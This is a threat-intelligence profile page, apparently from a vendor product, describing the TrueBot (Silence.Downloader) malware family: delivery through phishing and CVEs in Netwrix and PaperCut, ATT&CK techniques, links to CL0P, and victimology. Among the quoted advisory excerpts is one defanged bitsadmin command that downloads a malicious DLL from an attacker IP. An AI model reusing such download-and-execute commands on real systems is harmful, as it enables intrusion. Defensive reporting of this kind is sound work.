TrueBot, also known as Silence.Downloader, is a Windows malware family primarily used as a first-stage downloader and access-enablement tool in financially motivated intrusions. It has been observed since at least 2017 and is closely associated with the Silence threat group, with repeated reporting also linking its operations and follow-on payloads to TA505- and CL0P-related activity. TrueBot has been used to establish command-and-control, profile compromised hosts, retrieve and execute additional payloads, and support broader post-compromise operations including reconnaissance, lateral movement, credential access, data theft, and ransomware deployment.
Historically, TrueBot was delivered through phishing campaigns using malicious attachments or links. More recent activity shows a shift toward exploitation of exposed enterprise software vulnerabilities, notably CVE-2022-31199 in Netwrix Auditor and CVE-2023-27350 in PaperCut, as well as delivery through Raspberry Robin infections. In multiple observed intrusions, exploitation or initial access was followed by deployment of TrueBot and then secondary tooling such as Cobalt Strike and FlawedGrace.
Modern TrueBot variants collect host and domain information, enumerate running processes, identify security software, gather system metadata, and in some cases capture screenshots and Active Directory trust information. The malware can download and execute additional EXE, DLL, PowerShell, and batch payloads, and has been reported to load DLLs and shellcode directly in memory. It has also been associated with self-replication behavior inside victim environments and with deletion of operational artifacts to hinder analysis.
TrueBot commonly serves as an entry point for hands-on-keyboard intrusion activity. Follow-on operations observed after TrueBot infection include deployment of Cobalt Strike beacons, credential dumping from LSASS, pass-the-hash activity, remote session hijacking, network reconnaissance, lateral movement, and staged data exfiltration. A custom exfiltration utility known as Teleport has been used in intrusions involving TrueBot to steal victim data while blending outbound transfers with normal traffic. In some cases, these operations culminated in double-extortion ransomware incidents involving CL0P.
Victimology has included organizations in the United States and Canada, with notable exposure among internet-facing Windows servers and some concentration in education environments, though activity has not been limited to a single sector. TrueBot’s role as a modular downloader and intrusion facilitator makes it significant less as a standalone payload than as an operational bridge between initial compromise and full-scale enterprise intrusion.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Researchers have observed threat actors exploiting the more severe of the two vulnerabilities, CVE-2023-27350, to deliver the LockBit strain of ransomware. CVE-2023-27350 enables remote code execution (RCE); attackers leveraged it to run a PowerShell script that allows them to download and execute a file containing malicious payload analysts identified as the LockBit strain of ransomware. | the attackers exploited CVE-2023-27350 to run PowerShell commands that ultimately delivered the TrueBot malware to target systems, after which they deployed a Cobalt Strike beacon
The actors behind the recent Truebot campaign have shifted their delivery mechanism and are now exploiting a vulnerability in the on-premises and cloud-based IT system auditing software, Netwirx Auditor. The vulnerability, tracked as CVE-2022-31199 (CVSS: 9.8), is a Remote Code Execution (RCE) vulnerability that would enable a remote unauthenticated threat actor to execute code on vulnerable systems. | CISA, in coordination with the FBI, MS-ISAC, and CCCS, released a joint report on Truebot (aka. Silence) malware and a recently identified increase in infections targeting Canadian and US industries.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform.
Once they gained access to the server, they deployed the TrueBot malware, which has also been previously linked to the Clop ransomware operation.
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
CISA, in coordination with the FBI, MS-ISAC, and CCCS, released a joint report on Truebot (aka. Silence) malware and a recently identified increase in infections targeting Canadian and US industries.
CISA, in coordination with the FBI, MS-ISAC, and CCCS, released a joint report on Truebot (aka. Silence) malware and a recently identified increase in infections targeting Canadian and US industries.
Il existe des liens de codes et d’infrastructure entre FlawedAmmyy et Truebot (aka Silence.Downloader)...
As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
We found connections between ShadowSyndicate infrastructure and Cl0p/Truebot substantiating previous findings of GroupIB
The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
35 distinct techniques documented for this family, organized by ATT&CK tactic.
In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector.
Previously observed initial access methods include delivery via other malware (Raspberry Robin), drive-by-compromise, and malicious emails.
cyber threat actors have shifted tactics, exploiting, in observable manner, a remote code execution vulnerability (CVE-2022-31199) in Netwrix Auditor [T1190].
Previously observed initial access methods include delivery via other malware (Raspberry Robin), drive-by-compromise, and malicious emails.
Ces courriels contiennent une pièce jointe malveillante : soit sous la forme d’un document Word contenant une macro ou un exploit ; soit sous la forme d’un fichier ZIP ou RAR contenant un fichier CHM ; soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 ... ; soit sous la forme d’un fichier .lnk.
Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks... to deliver new Truebot malware variants.
In the hours after the initial infection, Truebot has also been observed deploying the Cobalt Strike red-team tool and using the Teleport tool to enable data exfiltration.
attackers leveraged it to run a PowerShell script that allows them to download and execute a file containing malicious payload
C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcodes in memory
CVE-2023-27350 enables remote code execution (RCE); attackers leveraged it to run a PowerShell script that allows them to download and execute a file containing malicious payload analysts identified as the LockBit strain of ransomware.
Truebot malware can be hidden within various, legitimate file formats that are used for malicious purposes [T1036.008].
Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations.
With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004].
the malicious process downloaded the Truebot .dll file and executed it using rundll32.exe.
the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST request
Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057].
Once a system is infected, the malware collects information and sends it to the attacker’s command and control (C2). This version collects additional information: a screenshot, the computer name, the local network name
This version collects additional information: a screenshot, the computer name, the local network name, and active directory trust relations.
In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector.
the HTTP communication includes new fields to include the network name and trust relations data and it is sent as a POST request with a parameter “q=<base64 encoded data>”.
332 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
22 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware delivered after exploitation of PaperCut CVE-2023-27350 in activity attributed to Lace Tempest; used as an initial payload before follow-on Cobalt Strike deployment, reconnaissance, lateral movement, and data exfiltration.
Malware payload observed being distributed through Raspberry Robin access.
Named malware mentioned as appearing in the same subnets discussed; the content provides no additional technical description beyond this co-occurrence.
Botnet malware associated with ShadowSyndicate and linked to ransomware operations.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.